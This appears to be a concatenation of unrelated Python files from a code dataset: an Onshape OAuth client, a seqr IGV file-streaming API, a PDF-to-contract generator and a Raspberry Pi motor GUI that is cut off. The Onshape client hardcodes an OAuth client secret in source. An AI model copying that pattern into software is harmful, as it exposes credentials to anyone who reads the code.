OnshapeClient.is_authenticated():\n callback(True)\n\n def __del__(self):\n self.cancel_auth()\n\n\nclass OnshapeAuthServer(BaseHTTPRequestHandler):\n code = None\n state = None\n params = None\n\n def 
do_GET(self):\n        try:\n            parsed_url = urlparse(self.path)\n            OnshapeAuthServer.params = self.path.split(\" \")[-1]\n            qs = parse_qs(parsed_url.query)\n            if \"code\" in qs:\n                OnshapeAuthServer.code = qs[\"code\"][0]\n            if \"state\" in qs:\n                OnshapeAuthServer.state = qs[\"state\"][0]\n            self.send_response(200)\n            self.send_header(\"Content-type\", \"text/html\")\n            self.end_headers()\n            self.wfile.write(bytes(\"Onshape Importer: Success\", \"utf-8\"))\n            self.wfile.write(bytes(\"\", \"utf-8\"))\n            self.wfile.write(\n                bytes(\n                    \"
You have successfully authorized access to your Onshape account.\nYou can continue to work in your application.
\",\n \"utf-8\",\n )\n )\n OnshapeClient.set_authenticated(True)\n OnshapeClient.set_handled_request(True)\n self.wfile.write(bytes(\"\", \"utf-8\"))\n except Exception as e:\n carb.log_error(\"Error handling auth callback GET: \" + str(e))\n\n def log_message(self, format, *args):\n return\n\n\nclass OnshapeClient(object):\n __onshape_client = None\n __user_mats_lib = None\n __authenticated = False\n __auth_callback = False\n __lock = Lock()\n __webServer = None\n __stop_request = False\n __handled_request = False\n __cleared_client = False\n\n @staticmethod\n def set_handled_request(value):\n OnshapeClient.__handled_request = value\n\n @staticmethod\n def is_authenticated():\n return OnshapeClient.__authenticated\n\n @staticmethod\n def createHttpServer(hostname, serverPort):\n if OnshapeClient.__webServer:\n OnshapeClient.stop_httpServer()\n\n OnshapeClient.__webServer = HTTPServer((hostname, serverPort), OnshapeAuthServer)\n\n return OnshapeClient.__webServer\n\n @staticmethod\n def get_httpServer():\n return OnshapeClient.__webServer\n\n @staticmethod\n def stop_httpServer():\n if OnshapeClient.__webServer:\n # time.sleep(3)\n OnshapeClient.__webServer.server_close()\n OnshapeClient.__webServer = None\n\n @staticmethod\n def set_auth_callback(callback):\n OnshapeClient.__auth_callback = callback\n\n @staticmethod\n def set_authenticated(auth):\n OnshapeClient.__authenticated = auth\n\n @staticmethod\n def clear_client():\n if OnshapeClient.__onshape_client:\n OnshapeClient.__onshape_client = None\n del Client.singleton_instace\n Client.clear_client()\n OnshapeClient.__cleared_client = True\n gc.collect()\n\n @staticmethod\n def auth_callback():\n ret = None\n if OnshapeClient.__auth_callback:\n ret = OnshapeClient.__auth_callback()\n OnshapeClient.__auth_callback = None\n return ret\n\n @staticmethod\n def get_oauth_client():\n hostName = \"localhost\"\n serverPort = 4518\n # ID and secret are naming conventions, this is not treated as a secret\n client_id = \"7XVZWE3MDZOCYSXEXUJLN4LNHADB42ASGPUPV6Y=\"\n client_secret = \"QZIMKKPIZYQO473R72QEU333XY33NSOXSOMMRUOJQ7HEHRDSPMBA====\"\n\n def auth_callback(url, fetch_token):\n # print(\"Auth callback\")\n if not OnshapeClient.__stop_request:\n qs = parse_qs(urlparse(url).query)\n state = None\n if \"state\" in qs:\n state = qs[\"state\"][0]\n webServer = OnshapeClient.createHttpServer(hostName, serverPort)\n # Credentials you get from registering a new application\n\n webbrowser.get().open(url)\n webServer.timeout = 1\n OnshapeClient.__handled_request = False\n while not (OnshapeClient.__handled_request or OnshapeClient.__stop_request):\n webServer.handle_request()\n\n webServer.server_close()\n if OnshapeClient.__handled_request and OnshapeAuthServer.params and not OnshapeClient.__stop_request:\n # thread = threading.Thread(target=webServer.handle_request)\n # thread.run()\n if state == OnshapeAuthServer.state:\n code = OnshapeAuthServer.code\n response_uri = \"https://{}:{}/oauth-redirect{}\".format(\n hostName, serverPort, OnshapeAuthServer.params[1:]\n )\n # print(response_uri)\n Client.get_client().set_grant_authorization_url_response(response_uri)\n # else:\n # response_uri = \"https://{}:{}/oauth-redirect\".format(hostName, serverPort)\n # try:\n # Client.get_client().set_grant_authorization_url_response(response_uri)\n # except Exception:\n # carb.log_warn(\"cancelled auth\")\n # fetch_token()\n\n # except Exception as e:\n # OnshapeClient.__stop_request = True\n # carb.log_error(\"error attempting to open Onshape Authentication: 
\" + str(e))\n\n base_url = carb.settings.get_settings().get(ONSHAPE_BASE_URL)\n OnshapeClient.__onshape_client = Client(\n keys_file=None,\n open_authorize_grant_callback=auth_callback,\n configuration={\n \"client_id\": client_id,\n \"client_secret\": client_secret,\n \"base_url\": base_url,\n \"host\": base_url,\n \"oauth_authorization_method\": \"python_callback\",\n \"pool_connections\": 100,\n \"pool_maxsize\": 10000,\n \"connection_pool_maxsize\": 10000,\n },\n )\n OnshapeClient.__onshape_client.configuration.host = base_url\n\n @staticmethod\n def authenticate(authenticated_callback):\n OnshapeClient.get()\n if not OnshapeClient.__authenticated:\n auth_popup = ui.Window(\n \"Onshape Authentication\",\n width=300,\n height=50,\n flags=ui.WINDOW_FLAGS_NO_RESIZE\n | ui.WINDOW_FLAGS_NO_SCROLLBAR\n | ui.WINDOW_FLAGS_NO_TITLE_BAR\n | ui.WINDOW_FLAGS_MODAL,\n )\n\n def callback(authenticated):\n if authenticated:\n OnshapeClient.__authenticated = True\n authenticated_callback()\n\n with auth_popup.frame:\n window = AuthWindow(auth_popup)\n # window.queue.put(OnshapeClient.get())\n window.start_auth(callback)\n return OnshapeClient.__authenticated\n\n @staticmethod\n def get():\n with OnshapeClient.__lock:\n if not OnshapeClient.__onshape_client:\n if Client.singleton_instance:\n OnshapeClient.__onshape_client = onshape_client.client.get_client()\n else:\n use_api_key = carb.settings.get_settings().get(USE_ONSHAPE_KEY)\n api_key = carb.settings.get_settings().get(DEFAULT_ONSHAPE_KEY)\n api_secret = carb.settings.get_settings().get(DEFAULT_ONSHAPE_SECRET)\n base_url = carb.settings.get_settings().get(ONSHAPE_BASE_URL)\n auth_url = carb.settings.get_settings().get(ONSHAPE_AUTH_URL)\n token_url = carb.settings.get_settings().get(ONSHAPE_TOKEN_URL)\n if use_api_key and api_key and api_secret:\n OnshapeClient.__onshape_client = Client(\n keys_file=None,\n configuration={\n \"access_key\": api_key,\n \"secret_key\": api_secret,\n \"base_url\": base_url,\n \"host\": base_url,\n \"authorization_uri\": auth_url,\n \"token_uri\": token_url,\n },\n )\n OnshapeClient.__onshape_client.configuration.host = base_url\n OnshapeClient.__authenticated = True\n else:\n if OnshapeClient.__cleared_client:\n OnshapeClient.__onshape_client = Client(\n keys_file=None, configuration={\"base_url\": base_url}\n )\n OnshapeClient.__onshape_client.configuration.host = base_url\n OnshapeClient.__cleared_client = False\n OnshapeClient.get_oauth_client()\n\n # Override the API accept map to workaround the API bug\n OnshapeClient.__onshape_client.assemblies_api.get_features.headers_map[\"accept\"] = [\n \"application/vnd.onshape.v1+json;charset=UTF-8;qs=0.1\"\n ]\n # print(OnshapeClient.__onshape_client.get_client().configuration.host)\n return OnshapeClient.__onshape_client.get_client()\n\n @staticmethod\n def get_material_library(did, eid):\n base_url = carb.settings.get_settings().get(ONSHAPE_BASE_URL)\n url = \"{}/api/materials/libraries/d/{}/e/{}\".format(base_url, did, eid)\n r = OnshapeClient.get().api_client.request(\"GET\", url, _preload_content=False, query_params={})\n if r.status == 200:\n return json.loads(r.data)\n return False\n\n @staticmethod\n def get_default_material_library():\n return OnshapeClient.get_material_library(\"2718281828459eacfeeda11f\", \"6bbab304a1f64e7d640a2d7d\")\n\n @staticmethod\n def get_default_material_libraries(update=False):\n if update or not OnshapeClient.__user_mats_lib:\n user_settings = OnshapeClient.get().users_api.get_user_settings_current_logged_in_user()\n libraries = 
user_settings[\"material_library_settings\"]\n OnshapeClient.__user_mats_lib = [\n OnshapeClient.get_material_library(libs[\"document_id\"], libs[\"element_id\"])\n for libs in libraries[\"libraries\"] + libraries[\"company_libraries\"]\n ]\n return OnshapeClient.__user_mats_lib\n\n @staticmethod\n def update_metadata(did, wdid, wid, eid, pid, body):\n base_url = carb.settings.get_settings().get(ONSHAPE_BASE_URL)\n url = \"{}/api/metadata/d/{}/{}/{}/e/{}/p/{}\".format(base_url, did, wdid, wid, eid, pid)\n headers = {\n \"accept\": \"application/vnd.onshape.v1+json;charset=UTF-8;qs=0.1\",\n \"Content-Type\": \"application/json;charset=UTF-8; qs=0.09\",\n \"content-length\": str(len(body)),\n }\n r = OnshapeClient.get().api_client.request(\n method=\"POST\", url=url, body=json.loads(body), headers=headers, _preload_content=False, query_params={}\n )\n return r\n","repo_name":"swadaskar/Isaac_Sim_Folder","sub_path":"exts/omni.isaac.onshape/omni/isaac/onshape/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":15203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22472632319","text":"import sys\n\nc = 0\ndata = [i.split('\\t') for i in map(str.strip, sys.stdin)]\n\nfor i in data:\n s = sorted([int(j) for j in i])\n if (all([n == 300 for n in s ])) or (sum(s) % 25 == 0):\n print(s)\n c += 1\n\n\nprint(c)\n\nif all(n == 300 for n in [300, 300]):\n print('yep')","repo_name":"danilinkp/EGE_tasks","sub_path":"9/9 из щелчка/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33906883504","text":"from collections import defaultdict\nimport json\nimport re\nimport requests\n\nfrom django.http import StreamingHttpResponse, HttpResponse\n\nfrom seqr.models import Individual, IgvSample\nfrom seqr.utils.file_utils import file_iter, does_file_exist, is_google_bucket_file_path, run_command, get_google_project\nfrom seqr.utils.redis_utils import safe_redis_get_json, safe_redis_set_json\nfrom seqr.views.utils.file_utils import save_uploaded_file\nfrom seqr.views.utils.json_to_orm_utils import get_or_create_model_from_json\nfrom seqr.views.utils.json_utils import create_json_response\nfrom seqr.views.utils.orm_to_json_utils import get_json_for_sample\nfrom seqr.views.utils.permissions_utils import get_project_and_check_permissions, \\\n check_project_permissions, \\\n login_and_policies_required, pm_or_data_manager_required, service_account_access\n\nGS_STORAGE_ACCESS_CACHE_KEY = 'gs_storage_access_cache_entry'\nGS_STORAGE_URL = 'https://storage.googleapis.com'\nCLOUD_STORAGE_URLS = {\n 's3': 'https://s3.amazonaws.com',\n 'gs': GS_STORAGE_URL,\n}\n\n\ndef _post_process_igv_records(project, individual_dataset_mapping, filename):\n info = []\n\n matched_individuals = Individual.objects.filter(family__project=project,\n individual_id__in=individual_dataset_mapping.keys())\n unmatched_individuals = set(individual_dataset_mapping.keys()) - {i.individual_id\n for i in\n matched_individuals}\n if len(unmatched_individuals) > 0:\n raise Exception('The following Individual IDs do not exist: {}'.format(\n \", \".join(unmatched_individuals)))\n\n info.append('Parsed {} rows in {} individuals from {}'.format(\n sum([len(rows) for rows in individual_dataset_mapping.values()]),\n len(individual_dataset_mapping), filename))\n\n existing_sample_files = defaultdict(set)\n for sample in 
IgvSample.objects.select_related('individual').filter(\n individual__in=matched_individuals):\n existing_sample_files[sample.individual.individual_id].add(sample.file_path)\n\n unchanged_rows = set()\n for individual_id, updates in individual_dataset_mapping.items():\n unchanged_rows.update([\n (individual_id, update['filePath']) for update in updates\n if update['filePath'] in existing_sample_files[individual_id]\n ])\n\n if unchanged_rows:\n info.append('No change detected for {} rows'.format(len(unchanged_rows)))\n\n all_updates = []\n for i in matched_individuals:\n all_updates += [\n dict(individualGuid=i.guid, **update) for update in\n individual_dataset_mapping[i.individual_id]\n if (i.individual_id, update['filePath']) not in unchanged_rows\n ]\n\n return info, all_updates\n\n@pm_or_data_manager_required\ndef receive_igv_table_handler(request, project_guid):\n project = get_project_and_check_permissions(project_guid, request.user, can_edit=True)\n\n def _process_alignment_records(rows, **kwargs):\n invalid_row = next((row for row in rows if not 2 <= len(row) <= 3), None)\n if invalid_row:\n raise ValueError(\"Must contain 2 or 3 columns: \" + ', '.join(invalid_row))\n parsed_records = defaultdict(list)\n for row in rows:\n parsed_records[row[0]].append({'filePath': row[1], 'sampleId': row[2] if len(row)> 2 else None})\n return parsed_records\n\n try:\n uploaded_file_id, filename, individual_dataset_mapping = save_uploaded_file(request, process_records=_process_alignment_records)\n\n info, all_updates = _post_process_igv_records(project, individual_dataset_mapping, filename)\n except Exception as e:\n return create_json_response({'errors': [str(e)]}, status=400)\n\n response = {\n 'updates': all_updates,\n 'uploadedFileId': uploaded_file_id,\n 'errors': [],\n 'info': info,\n }\n return create_json_response(response)\n\n\nSAMPLE_TYPE_MAP = [\n ('bam', IgvSample.SAMPLE_TYPE_ALIGNMENT),\n ('cram', IgvSample.SAMPLE_TYPE_ALIGNMENT),\n ('bigWig', IgvSample.SAMPLE_TYPE_COVERAGE),\n ('junctions.bed.gz', IgvSample.SAMPLE_TYPE_JUNCTION),\n ('bed.gz', IgvSample.SAMPLE_TYPE_GCNV),\n]\n\n\n@pm_or_data_manager_required\ndef update_individual_igv_sample(request, individual_guid):\n return update_individual_igv_sample_base(request, individual_guid)\n\n\ndef update_individual_igv_sample_base(request, individual_guid):\n individual = Individual.objects.get(guid=individual_guid)\n project = individual.family.project\n check_project_permissions(project, request.user, can_edit=True)\n\n request_json = json.loads(request.body)\n\n try:\n file_path = request_json.get('filePath')\n if not file_path:\n raise ValueError('request must contain fields: filePath')\n\n sample_type = next((st for suffix, st in SAMPLE_TYPE_MAP if file_path.endswith(suffix)), None)\n if not sample_type:\n raise Exception('Invalid file extension for \"{}\" - valid extensions are {}'.format(\n file_path, ', '.join([suffix for suffix, _ in SAMPLE_TYPE_MAP])))\n if not does_file_exist(file_path, user=request.user):\n raise Exception('Error accessing \"{}\"'.format(file_path))\n\n sample, created = get_or_create_model_from_json(\n IgvSample, create_json={'individual': individual, 'sample_type': sample_type},\n update_json={'file_path': file_path, 'sample_id': request_json.get('sampleId')}, user=request.user)\n\n response = {\n 'igvSamplesByGuid': {\n sample.guid: get_json_for_sample(sample, individual_guid=individual_guid, family_guid=individual.family.guid, project_guid=project.guid)}\n }\n if created:\n response['individualsByGuid'] = 
{\n individual.guid: {'igvSampleGuids': [s.guid for s in individual.igvsample_set.all()]}\n }\n return create_json_response(response)\n except Exception as e:\n error = str(e)\n return create_json_response({'error': error}, status=400, reason=error)\n\n\n@login_and_policies_required\ndef fetch_igv_track(request, project_guid, igv_track_path):\n\n get_project_and_check_permissions(project_guid, request.user)\n\n if igv_track_path.endswith('.bam.bai') and not does_file_exist(igv_track_path, user=request.user):\n igv_track_path = igv_track_path.replace('.bam.bai', '.bai')\n\n if is_google_bucket_file_path(igv_track_path):\n return _stream_gs(request, igv_track_path)\n\n return _stream_file(request, igv_track_path)\n\n\ndef _stream_gs(request, gs_path):\n headers = _get_gs_rest_api_headers(request.META.get('HTTP_RANGE'), gs_path, user=request.user)\n\n response = requests.get(\n f\"{GS_STORAGE_URL}/{gs_path.replace('gs://', '', 1)}\",\n headers=headers,\n stream=True)\n\n return StreamingHttpResponse(response.iter_content(chunk_size=65536), status=response.status_code,\n content_type='application/octet-stream')\n\n\ndef _get_gs_rest_api_headers(range_header, gs_path, user=None):\n headers = {'Authorization': 'Bearer {}'.format(_get_access_token(user))}\n if range_header:\n headers['Range'] = range_header\n google_project = get_google_project(gs_path)\n if google_project:\n headers['x-goog-user-project'] = get_google_project(gs_path)\n\n return headers\n\n\ndef _get_token_expiry(token):\n response = requests.post('https://www.googleapis.com/oauth2/v1/tokeninfo',\n headers={'Content-Type': 'application/x-www-form-urlencoded'},\n data='access_token={}'.format(token))\n if response.status_code == 200:\n result = json.loads(response.text)\n return result['expires_in']\n else:\n return 0\n\n\ndef _get_access_token(user):\n access_token = safe_redis_get_json(GS_STORAGE_ACCESS_CACHE_KEY)\n if not access_token:\n process = run_command('gcloud auth print-access-token', user=user)\n if process.wait() == 0:\n access_token = next(process.stdout).decode('utf-8').strip()\n expires_in = _get_token_expiry(access_token)\n safe_redis_set_json(GS_STORAGE_ACCESS_CACHE_KEY, access_token, expire=expires_in-5)\n return access_token\n\n\ndef _stream_file(request, path):\n # based on https://gist.github.com/dcwatson/cb5d8157a8fa5a4a046e\n content_type = 'application/octet-stream'\n range_header = request.META.get('HTTP_RANGE', None)\n if range_header:\n range_match = re.compile(r'bytes\\s*=\\s*(\\d+)\\s*-\\s*(\\d*)', re.I).match(range_header)\n first_byte, last_byte = range_match.groups()\n first_byte = int(first_byte) if first_byte else 0\n last_byte = int(last_byte)\n length = last_byte - first_byte + 1\n resp = StreamingHttpResponse(\n file_iter(path, byte_range=(first_byte, last_byte), raw_content=True, user=request.user), status=206, content_type=content_type)\n resp['Content-Length'] = str(length)\n resp['Content-Range'] = 'bytes %s-%s' % (first_byte, last_byte)\n else:\n resp = StreamingHttpResponse(file_iter(path, raw_content=True, user=request.user), content_type=content_type)\n resp['Accept-Ranges'] = 'bytes'\n return resp\n\n\ndef igv_genomes_proxy(request, cloud_host, file_path):\n # IGV does not properly set CORS header and cannot directly access the genomes resource from the browser without\n # using this server-side proxy\n headers = {}\n range_header = request.META.get('HTTP_RANGE')\n if range_header:\n headers['Range'] = range_header\n\n genome_response = 
requests.get(f'{CLOUD_STORAGE_URLS[cloud_host]}/{file_path}', headers=headers)\n proxy_response = HttpResponse(\n content=genome_response.content,\n status=genome_response.status_code,\n )\n return proxy_response\n\n\n@service_account_access\ndef sa_get_igv_updates_required(request, project_guid):\n project = get_project_and_check_permissions(project_guid, request.user, can_edit=True)\n json_body = json.loads(request.body)\n json_records = json_body.get('mapping')\n\n info, all_updates = _post_process_igv_records(\n project, json_records, ''\n )\n\n # I was initially looking to completely merge this in, except the call is slow\n # and I genuinely think the request will time out, so make the caller do the\n # spacing out.\n return create_json_response({\n 'updates': all_updates,\n 'errors': [],\n 'info': info,\n })\n\n@service_account_access\ndef sa_update_igv_individual(request, individual_guid):\n return update_individual_igv_sample_base(request, individual_guid)\n","repo_name":"populationgenomics/seqr","sub_path":"seqr/views/apis/igv_api.py","file_name":"igv_api.py","file_ext":"py","file_size_in_byte":10786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"37427455981","text":"import pandas as pd\nimport numpy as np\nimport re, os, camelot\nfrom PyPDF2 import PdfFileReader\nfrom pathlib import Path\nimport numpy\nfrom docxtpl import DocxTemplate\n\ndef getDateText(date_format_num):\n months = [\n '',\n 'Enero', \n 'Febrero',\n 'Marzo',\n 'Abril',\n 'Mayo',\n 'Junio',\n 'Julio',\n 'Agosto',\n 'Septiembre',\n 'Octubre',\n 'Noviembre',\n 'Diciembre']\n date_credit_num = date_format_num.split('/')\n # print(date_credit_num)\n return date_credit_num[0] + ' de ' + months[int(str(date_credit_num[1]))] + ' de ' + date_credit_num[2]\n\ndef number_text(number):\n from nlt import numlet as nl\n number_text = '{:,.2f}'.format(number)\n return \"$ {} ({} PESOS {}/100 M.N.)\".format(\n number_text,\n nl.Numero(int(number)).a_letras.upper(),\n str(number_text).split('.')[1])\n\n\ndef generateContract(dir_csv, inputs_files, ouput_files, date_generate):\n\n datacsv = pd.read_csv(dir_csv,encoding = 'utf-8')\n\n files = inputs_files # route to find files PDF\n dirFiles = os.listdir(files) # list files in route\n\n CREDIT = None\n CLIENT_NAME = None\n CLIENT_RFC = None\n ANTEC_DATE = None\n ANTEC_CREDIT = None\n ANTEC_AMOUNT = None\n ENGINE = None\n SERIE = None\n BRAND = None\n MODEL = None\n COLOUR = None\n AMOUNT_OWED = None\n REFERENCE = None\n ADDRESS = None\n N_END_PAY = None\n END_DATE_PAY = None\n BULLET = None\n LETTER_COND = False\n AMOUNT_MONTH = None\n DATE = date_generate \n NUMBER_CLIENT = None \n TYPE_LAYOUT = None\n\n # data frame\n dfs = []\n\n for fichero in dirFiles: # each file to do\n\n # print(fichero)\n\n ficheropath = os.path.join(files, fichero) # complete route of file\n\n if os.path.isfile(ficheropath) and (fichero.endswith('.pdf') or fichero.endswith('.PDF')): # validate PDF\n\n temp = open(os.path.join(files, fichero), 'rb')\n PDF_read = PdfFileReader(temp)\n first_page = PDF_read.getPage(0)\n text = str(first_page.extractText()) # get text of file\n\n parts = text.split()\n start_amount = text.find('$')\n end_amount = text.find('M.N.')\n AMOUNTPAY = text[start_amount: end_amount+5]\n\n # Find number of credit in document\n start_credit = text.find('1-7200')\n CREDIT = text[start_credit:start_credit+11]\n\n # Search name of cliente with number of credit\n for i in datacsv.index:\n if str(CREDIT).strip() == 
datacsv['CREDITO'][i]:\n CLIENT_NAME = str(datacsv['NOMBRE'][i]).strip()\n AMOUNT_OWED = AMOUNTPAY # str(datacsv['ADEUDO'][i]).strip()\n CLIENT_RFC = str(datacsv['RFC'][i]).strip()\n NUMBER_CLIENT = str(datacsv['CLIENTE'][i]).strip()\n ANTEC_CREDIT = datacsv['CTO_ANT'][i]\n ANTEC_AMOUNT = number_text(float(datacsv['MON_CTO_ANT'][i])) #datacsv['MON_CTO_ANT'][i]\n ANTEC_DATE = getDateText(datacsv['FECHA_CTO_ANT'][i])\n ENGINE = str(datacsv['MOTOR'][i]).strip()\n SERIE = str(datacsv['VIN'][i]).strip()\n BRAND = str(datacsv['MARCA'][i]).strip()\n MODEL = str(datacsv['MODELO'][i]).strip()\n COLOUR = str(datacsv['COLOR'][i]).strip()\n REFERENCE = str(datacsv['REFERENCIA'][i]).zfill(11)\n ADDRESS = str(datacsv['DOMICILIO'][i]).strip()\n TYPE_LAYOUT = str(datacsv['VENTA'][i]).strip()\n\n tables = camelot.read_pdf(os.path.join(files, fichero)) # find tables in PDF\n df = tables[0].df # in the pays, the tables is in first page\n df_out = pd.DataFrame(df) \n # print(df_out)\n # get number of pay\n pay = re.split(\"\\\\n| \", df_out[0][1])\n # get date of pay\n dates = re.split(\"\\\\n| \", df_out[1][1])\n # get month pay\n months = re.split(\"\\\\n| \", df_out[2][1])\n # generate table with the list \n table_data = []\n table_data.append(pay)\n table_data.append(dates)\n table_data.append(months)\n partial_income_table = []\n var = 0\n # build the data matrix, list of lists\n for i in range(len(table_data[0])):\n aux = []\n aux.append(table_data[0][i])\n aux.append(table_data[1][i])\n aux.append(table_data[2][i])\n partial_income_table.append(aux)\n var += float(str(table_data[2][i]).replace(\",\",\"\"))\n dataValues = []\n # iterate the matrix of values\n for row in partial_income_table:\n aux_dic = {} # crate the dictionary\n aux_dic['cols'] = row # add value 'list' with the key \n dataValues.append(aux_dic) # add dictionary in the list\n\n N_END_PAY = table_data[0][len(table_data[0])-1]\n END_DATE_PAY = getDateText(table_data[1][len(table_data[0])-1])\n BULLET = float(str(table_data[2][len(table_data[0])-1]).replace(',',''))\n AMOUNT_MONTH = float(str(table_data[2][len(table_data[0])-2]).replace(',',''))\n\n context = {\n 'credit' : CREDIT,\n 'name' : CLIENT_NAME,\n 'client': NUMBER_CLIENT,\n 'antec_date':ANTEC_DATE,\n 'antec_credit':ANTEC_CREDIT,\n 'antec_amount':ANTEC_AMOUNT,\n 'engine':ENGINE,\n 'serie':SERIE,\n 'brand':BRAND,\n 'model':MODEL,\n 'colour':COLOUR,\n 'address':ADDRESS,\n 'rfc_client':CLIENT_RFC,\n 'amount_owed':AMOUNT_OWED,\n 'final_date':END_DATE_PAY,\n 'tbl_data' : dataValues,\n 'reference_banck':REFERENCE,\n 'date':DATE, \n 'carta_condonacion':LETTER_COND \n }\n \n if BULLET > AMOUNT_MONTH:\n context['carta_condonacion'] = True\n context['credit'] = CREDIT\n context['nmonths'] = N_END_PAY\n context['amount_month'] = number_text(AMOUNT_MONTH)\n context['condonation_amount'] = number_text(BULLET - AMOUNT_MONTH)\n\n fileDir = ouput_files\n\n try:\n os.stat(fileDir)\n except:\n os.mkdir(fileDir)\n\n if TYPE_LAYOUT == 'OSER':\n PRINCEPS_V2 = DocxTemplate('C:/Users/FINSUS-Admin/Documents/Code Projects/render-contracts/layouts/OSER CONVENIO DE RECONOCIMIENTO DE ADEUDO Y REESTRUCTURA V2.docx')\n PRINCEPS_V2.render(context)\n PRINCEPS_V2.save(fileDir + '/' + str(CLIENT_NAME) + \"_\" + str(CREDIT) + \"_\" + str(int(AMOUNT_MONTH)) + 'PR_V2_' + \".docx\") \n print(str(CLIENT_NAME) + \"_\" + str(CREDIT) + \"_\" + str(int(AMOUNT_MONTH)) + 'PR_V2_' + \".docx\")\n if TYPE_LAYOUT == 'GSJ':\n PRINCEPS_V2 = DocxTemplate('C:/Users/FINSUS-Admin/Documents/Code Projects/render-contracts/layouts/GSJ 
CONVENIO DE RECONOCIMIENTO DE ADEUDO Y REESTRUCTURA V2.docx')\n PRINCEPS_V2.render(context)\n PRINCEPS_V2.save(fileDir + '/' + str(CLIENT_NAME) + \"_\" + str(CREDIT) + \"_\" + str(int(AMOUNT_MONTH)) + 'PR_V2_' + \".docx\")\n print(str(CLIENT_NAME) + \"_\" + str(CREDIT) + \"_\" + str(int(AMOUNT_MONTH)) + 'PR_V2_' + \".docx\") \n if TYPE_LAYOUT == 'CARPENTUM':\n PRINCEPS_V2 = DocxTemplate('C:/Users/FINSUS-Admin/Documents/Code Projects/render-contracts/layouts/CARPENTUM CONVENIO DE RECONOCIMIENTO DE ADEUDO Y REESTRUCTURA V2.docx')\n PRINCEPS_V2.render(context)\n PRINCEPS_V2.save(fileDir + '/' + str(CLIENT_NAME) + \"_\" + str(CREDIT) + \"_\" + str(int(AMOUNT_MONTH)) + 'PR_V3C_' + \".docx\")\n print(str(CLIENT_NAME) + \"_\" + str(CREDIT) + \"_\" + str(int(AMOUNT_MONTH)) + 'PR_V3C_' + \".docx\") \n if TYPE_LAYOUT == 'MERICULTER':\n PRINCEPS_V2 = DocxTemplate('C:/Users/FINSUS-Admin/Documents/Code Projects/render-contracts/layouts/MERICULTER CONVENIO DE RECONOCIMIENTO DE ADEUDO Y REESTRUCTURA V2.docx')\n PRINCEPS_V2.render(context)\n PRINCEPS_V2.save(fileDir + '/' + str(CLIENT_NAME) + \"_\" + str(CREDIT) + \"_\" + str(int(AMOUNT_MONTH)) + 'PR_V3M_' + \".docx\")\n print(str(CLIENT_NAME) + \"_\" + str(CREDIT) + \"_\" + str(int(AMOUNT_MONTH)) + 'PR_V3M_' + \".docx\") \n\n \n\nif __name__ == '__main__':\n\n dir_in_files = \"C:/Users/FINSUS-Admin/Documents/Contratos/13 de marzo\"\n\n dir_out_files = \"C:/Users/FINSUS-Admin/Documents/Contratos/13 de marzo\"\n\n dirCSVFile = 'C:/Users/FINSUS-Admin/Documents/PRINCEPS/Book2.csv'\n\n generateContract(dirCSVFile, dir_in_files, dir_out_files, '01 de marzo de 2023')\n\n \n\n # counter_amounts = 0 # len(table_data[0]) \n\n # # print(BULLET, ' ',counter_amounts, ' ', ncondonations, ' ', amount_condonation, ' ', BULLET_END)\n # # get number of condonations\n # for i in range(len(table_data[0])):\n # if int(i+1) % 4 == 0:\n # counter_amounts += 1\n # for i in range(len(table_data[0])):\n # if int(i+1) % 4 == 0:\n # print(i+1, table_data[1][i], round(float(BULLET) / counter_amounts, 2))\n # print(BULLET, counter_amounts)","repo_name":"GustavoBD-Dev/FINSUS-code","sub_path":"render-contracts/src/validate_pr2.py","file_name":"validate_pr2.py","file_ext":"py","file_size_in_byte":10497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13489108382","text":"import RPi.GPIO as GPIO\nimport tkinter as tk\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(11, GPIO.OUT)\nGPIO.setup(12, GPIO.OUT)\nGPIO.setup(15, GPIO.OUT)\nGPIO.setup(16, GPIO.OUT)\n\nTK = tk.Tk()\n\ndef FOR_M1():\n GPIO.output(11, GPIO.HIGH)\n GPIO.output(12, GPIO.LOW)\n\ndef REV_M1():\n GPIO.output(11, GPIO.LOW)\n GPIO.output(12, GPIO.HIGH)\ndef STOP_M1():\n GPIO.output(11, GPIO.LOW)\n GPIO.output(12, GPIO.LOW)\n\nNut_FOR_M1 = tk.Button(TK, height = 5,width = 15, text =\"FOR_M1\", command = FOR_M1)\nNut_REV_M1 = tk.Button(TK, height = 5,width = 15, text =\"REV_M1\", command = REV_M1)\nNut_STOP_M1 = tk.Button(TK, height = 5,width = 15, text =\"STOP_M1\", command = STOP_M1)\n\nNut_FOR_M1.pack()\nNut_REV_M1.pack()\nNut_STOP_M1.pack()\n\ndef FOR_M2():\n GPIO.output(15, GPIO.HIGH)\n GPIO.output(16, GPIO.LOW)\n\ndef REV_M2():\n GPIO.output(15, GPIO.LOW)\n GPIO.output(16, GPIO.HIGH)\ndef STOP_M2():\n GPIO.output(15, GPIO.LOW)\n GPIO.output(16, GPIO.LOW)\n\nNut_FOR_M2 = tk.Button(TK, height = 5,width = 15, text =\"FOR_M2\", command = FOR_M2)\nNut_REV_M2 = tk.Button(TK, height = 5,width = 15, text =\"REV_M2\", command = REV_M2)\nNut_STOP_M2 = tk.Button(TK, height = 
